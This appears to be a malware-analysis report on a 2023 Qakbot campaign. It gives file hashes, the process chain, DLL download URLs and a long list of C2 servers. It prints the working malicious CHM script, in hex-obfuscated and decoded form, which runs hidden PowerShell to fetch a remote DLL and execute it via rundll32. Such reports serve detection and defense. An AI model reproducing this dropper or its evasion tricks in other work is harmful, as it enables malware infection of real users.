Qakbot_BB16_20.02.2023.txt
20.02.2023 | Qakbot | BB16 | Campaign 1676886180 | Version 404.9
*************************************************
.one 6778c59a29e25d722230163bea272ece58d2d3696fbce4347c20104e8fb735dc - item.one
.chm 0dbc95d60b957669b5ae6e6977bae478738209fdb51dff780121320d6248b8e7
.dll b91340d156582060095227e8d26f29f5ffc8b0e8fbf35a392b649adc60a5d4ab
*************************************************
Execution chain (observed process command lines) >
ONENOTE.EXE C:\Users\Admin\AppData\Local\Temp\item.one
hh.exe C:\Users\Admin\AppData\Local\Temp\O P E N.chm
cmd.exe /c start /min powershell IWR -uri http://165.22.160.25/w9edb/160223 -o %temp%\adeP1F.dll;start-process rundll32 %temp%\adeP1F.dll,N115
powershell IWR -uri http://165.22.160.25/w9edb/160223 -o C:\Users\Admin\AppData\Local\Temp\adeP1F.dll;start-process rundll32 C:\Users\Admin\AppData\Local\Temp\adeP1F.dll,N115
rundll32.exe" C:\Users\Admin\AppData\Local\Temp\adeP1F.dll N115
*************************************************
.dll distribution URLs
http://165.22.160.25/w9edb/160223/adeP1F.dll
https://osjovanmikic.edu.rs/DwJDgf7/130223/aJ1vC.dll
http://147.182.206.33/FtFb/160223/aaSQMCd.dll
*************************************************
CHM file contents >> index.html
<script>
// Hex (base16) to text decoder embedded in the CHM's index.html: every two
// characters of the input are parsed as one hex byte and appended as a char.
// The decoded output is the HTML reproduced further down in this report.
function a0b85FJ9T(a5sj1nx)
{
// Coerce the argument to a string before indexing into it.
var aJQDXq = a5sj1nx.toString();
var acApqOPr = '';
// Walk the string two characters at a time; each pair is one hex-encoded byte.
for(var anhBObj9 = 0; anhBObj9 < aJQDXq.length; anhBObj9 += 2)
{
acApqOPr += String.fromCharCode(parseInt(aJQDXq.substr(anhBObj9, 2), 16));
}
return(acApqOPr);
}
// Decodes the hex payload and injects the result into the page with
// document.write, so the <object> and <script> elements it contains exist
// only at run time; a naive static scan of index.html sees just a hex string.
// NOTE(review): the hex literal is shown here split across two lines; in the
// original file it is presumably one unbroken string, since a JS string
// literal cannot span a line break.
document.write(a0b85FJ9T('0d0a093c21444f43545950452048544d4c3e0d0a093c212d2d5b6966206c742049452037205d3e3c68746d6c206c616e673d22656e2220636c6173733d2269652069653622206469723d226c74722220786d6c6e733a4d5348656c703d2275726e3a736368656d61732d6d6963726f736f66742d636f6d3a6d7368656c70223e3c215b656e6469665d2d2d3e200d0a093c212d2d5b69662049452037205d3e3c68746d6c206c616e673d22656e2220636c6173733d2269652069653722206469723d226c74722220786d6c6e733a4d5348656c703d2275726e3a736368656d61732d6d6963726f736f66742d636f6d3a6d7368656c70223e3c215b656e6469665d2d2d3e200d0a093c212d2d5b69662049452038205d3e3c68746d6c206c616e673d22656e2220636c6173733d2269652069653822206469723d226c74722220786d6c6e733a4d5348656c703d2275726e3a736368656d61732d6d6963726f736f66742d636f6d3a6d7368656c70223e3c215b656e6469665d2d2d3e200d0a093c212d2d5b69662049452039205d3e3c68746d6c206c616e673d22656e2220636c6173733d2269652069653922206469723d226c74722220786d6c6e733a4d5348656c703d2275726e3a736368656d61732d6d6963726f736f66742d636f6d3a6d7368656c70223e3c215b656e6469665d2d2d3e200d0a093c212d2d5b6966202149455d3e0d0a093c212d2d3e0d0a093c68746d6c206c616e673d22656e22206469723d226c74722220786d6c6e733a4d5348656c703d2275726e3a736368656d61732d6d6963726f736f66742d636f6d3a6d7368656c70223e0d0a093c212d2d3c215b656e6469665d2d2d3e0d0a093c686561643e0d0a093c6d65746120687474702d65717569763d22436f6e74656e742d547970652220636f6e74656e743d22746578742f68746d6c3b20636861727365743d5554462d38223e0d0a093c2f686561643e0d0a093c626f64793e0d0a09093c68313e416e20696e7465726e616c206572726f7220686173206f636375727265643c2f68313e0d0a09093c6f626a6563742069643d73686f727463757420636c61737369643d22636c7369643a35326132616161652d303835642d343138372d393765612d386333306462393930343336222077696474683d313030206865696768743d3130303e0d0a09093c706172616d206e616d653d22436f6d6d616e64222076616c75653d2273686f7274637574223e0d0a09093c706172616d206e616d653d224974656d31222076616c75653d222c636d642c2f63207374617274202f6d696e20706f7765727368656c6c20495752202d75726920687474703a2f2f3136352e32322e
3136302e32352f77396564622f313630323233202d6f202574656d70255c6164655031462e646c6c3b73746172742d70726f636573732072756e646c6c3332202574656d70255c6164655031462e646c6c2c4e313135223e0d0a09093c2f6f626a6563743e0d0a09093c736372697074206c616e67756167653d227662736372697074223e0d0a0909737472203d2022436c69220d0a09093c2f7363726970743e0d0a09093c7363726970743e0d0a09090973686f72746375745b737472202b2022636b225d28293b0d0a09093c2f7363726970743e0d0a093c2f626f64793e0d0a093c2f68746d6c3e0d0a09'));
</script>
>> index.html decoded from the hex (base16) char codes above
<!DOCTYPE HTML>
<!-- Decoded index.html recovered from the .chm. The markup is reproduced as
     recovered; analyst notes are added only as HTML comments. -->
<!--[if lt IE 7 ]><html lang="en" class="ie ie6" dir="ltr" xmlns:MSHelp="urn:schemas-microsoft-com:mshelp"><![endif]-->
<!--[if IE 7 ]><html lang="en" class="ie ie7" dir="ltr" xmlns:MSHelp="urn:schemas-microsoft-com:mshelp"><![endif]-->
<!--[if IE 8 ]><html lang="en" class="ie ie8" dir="ltr" xmlns:MSHelp="urn:schemas-microsoft-com:mshelp"><![endif]-->
<!--[if IE 9 ]><html lang="en" class="ie ie9" dir="ltr" xmlns:MSHelp="urn:schemas-microsoft-com:mshelp"><![endif]-->
<!--[if !IE]>
<!-->
<html lang="en" dir="ltr" xmlns:MSHelp="urn:schemas-microsoft-com:mshelp">
<!--<![endif]-->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
</head>
<body>
<!-- Presumably decoy text: the only thing the user sees in the help window. -->
<h1>An internal error has occurred</h1>
<!-- HTML Help ActiveX control (hhctrl.ocx) with Command="shortcut": the
     Item1 parameter is the command line the control executes when its
     Click() method is invoked. This matches the process chain listed earlier
     in this report (hh.exe, then cmd.exe /c start /min powershell ...), and
     hh.exe spawning cmd.exe or powershell.exe is the process-tree relationship
     to alert on. -->
<object id=shortcut classid="clsid:52a2aaae-085d-4187-97ea-8c30db990436" width=100 height=100>
<param name="Command" value="shortcut">
<param name="Item1" value=",cmd,/c start /min powershell IWR -uri http://165.22.160.25/w9edb/160223 -o %temp%\adeP1F.dll;start-process rundll32 %temp%\adeP1F.dll,N115">
</object>
<!-- The method name "Click" is assembled at run time from a VBScript half
     ("Cli") and a JScript half ("ck"), presumably so the literal string never
     appears in the page; the second script then calls shortcut.Click(). -->
<script language="vbscript">
str = "Cli"
</script>
<script>
shortcut[str + "ck"]();
</script>
</body>
</html>
*************************************************
C2 servers (IP:port)
201.244.108.183:995
202.186.177.88:443
47.21.51.138:995
27.0.48.233:443
103.212.19.254:995
71.31.101.183:443
190.11.198.74:443
86.225.214.138:2222
24.9.220.167:443
95.255.60.223:995
73.36.196.11:443
174.104.184.149:443
136.232.184.134:995
74.92.243.113:50000
184.176.35.223:2222
64.237.185.60:443
151.65.224.211:443
31.53.29.145:2222
85.241.180.94:443
47.21.51.138:443
72.80.7.6:50003
82.127.204.82:2222
86.188.32.131:443
27.99.45.237:2222
202.142.98.62:443
98.145.23.67:443
72.80.7.6:995
122.184.143.82:443
180.151.108.14:443
50.68.186.195:443
176.142.207.63:443
87.223.82.41:443
92.27.86.48:2222
136.244.25.165:443
77.124.6.149:443
150.107.231.59:2222
103.111.70.115:995
109.11.175.42:2222
183.87.163.165:443
79.67.165.149:995
87.221.197.113:2222
93.24.192.142:20
83.7.53.157:443
76.20.42.45:443
75.158.15.211:443
12.172.173.82:2087
50.68.204.71:993
59.28.84.65:443
58.247.115.126:995
81.229.117.95:2222
69.133.162.35:443
89.32.159.192:995
75.156.125.215:995
70.64.77.115:443
181.164.217.211:443
92.17.122.33:2222
93.156.99.48:443
86.176.144.213:2222
217.128.91.196:2222
198.2.51.242:993
50.68.204.71:995
45.50.233.214:443
205.164.227.222:443
81.157.227.223:2222
86.207.227.152:2222
147.219.4.194:443
213.67.255.57:2222
49.245.82.178:2222
91.165.188.74:50000
76.80.180.154:995
89.79.229.50:443
78.130.215.67:443
12.172.173.82:32101
139.5.239.14:443
114.92.98.210:995
116.72.250.18:443
92.97.197.177:2222
202.142.98.62:995
91.170.115.68:32100
119.155.227.81:995
87.243.146.59:443
86.96.72.139:2222
5.193.84.234:2222
46.27.231.50:2078
72.203.216.98:2222
76.170.252.153:995
75.143.236.149:443
72.200.109.104:443
103.111.70.115:443
217.165.1.53:2222
2.50.47.74:443
108.190.203.42:995
116.74.164.67:443
50.68.204.71:443
125.99.69.178:443
197.0.251.32:443
87.57.13.215:443
12.172.173.82:995
162.248.14.107:443
75.98.154.19:443
92.154.45.81:2222
86.130.9.146:2222
89.129.109.27:2222
27.109.19.90:2078
81.157.202.71:995
24.206.27.39:443
181.118.206.65:995
72.188.103.221:443
31.166.48.125:995
217.128.200.114:2222
12.172.173.82:465
84.219.213.130:6881
12.172.173.82:990
12.172.173.82:21
47.34.30.133:443
84.35.26.14:995
172.248.42.122:443
24.239.69.244:443
173.18.126.3:443
202.187.232.161:995